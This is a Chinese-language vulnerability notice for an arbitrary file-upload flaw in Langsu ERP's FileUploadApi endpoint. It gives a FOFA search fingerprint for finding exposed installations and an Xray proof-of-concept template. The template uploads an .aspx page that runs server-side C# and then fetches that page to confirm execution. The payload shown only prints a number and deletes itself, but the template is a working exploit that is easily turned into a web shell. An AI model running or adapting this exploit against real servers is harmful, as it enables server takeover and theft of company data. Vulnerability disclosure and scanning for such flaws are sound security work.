朗速ERP后台管理系统FileUploadApi存在文件上传漏洞
漏洞细节参考链接:https://mp.weixin.qq.com/s/nMRnxBicTEiKJtfT0R3wQA
漏洞介绍:
郎速 ERP 是一款功能强大的企业资源计划(ERP)软件,专为中小企业量身打造,旨在帮助企业优化管理流程、提升运营效率。不仅适用于制造业,还广泛适用于零售、物流、服务等多个行业。朗速ERP后台管理系统中的FileUploadApi接口文件存在文件上传漏洞,攻击者可利用该漏洞上传恶意文件,进而控制服务器或窃取企业敏感信息。
资产指纹:
body="/Resource/Scripts/Yw/Yw_Bootstrap.js"
Xray-poc:
name: poc-yaml-lum-soft-fileuploadapi-fileupload manual: true set: randint: randomInt(1000000, 9999999) rboundary: randomLowercase(16) randname: randomLowercase(6) transport: http rules: r0: request: cache: true method: POST path: /Api/FileUploadApi.ashx?method=DoWebUpload headers: Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{rboundary}} body: "------WebKitFormBoundary{{rboundary}}\r\nContent-Disposition: form-data; name=\"file\";filename=\"{{randname}}.aspx\"\r\n\r\n<%@ Page Language=\"C#\"%><% Response.Write(\"{{randint}}\");System.IO.File.Delete(Server.MapPath(Request.Url.AbsolutePath)); %>\r\n------WebKitFormBoundary{{rboundary}}--" expression: response.status == 200 && response.body_string.contains("WebRelPath") output: search: '"WebRelPath\":\"(?P<uploadfile>.+?).aspx\",".bsubmatch(response.body)' uploadfile: search["uploadfile"] r1: request: cache: true method: GET path: /{{uploadfile}}.aspx expression: response.status == 200 && response.body_string.contains(string(randint)) expression: r0() && r1() detail: author: cysec links: - https://mp.weixin.qq.com/s/nMRnxBicTEiKJtfT0R3wQA description: 朗速ERP后台管理系统FileUploadApi存在文件上传漏洞 fofakeyword: body="/Resource/Scripts/Yw/Yw_Bootstrap.js"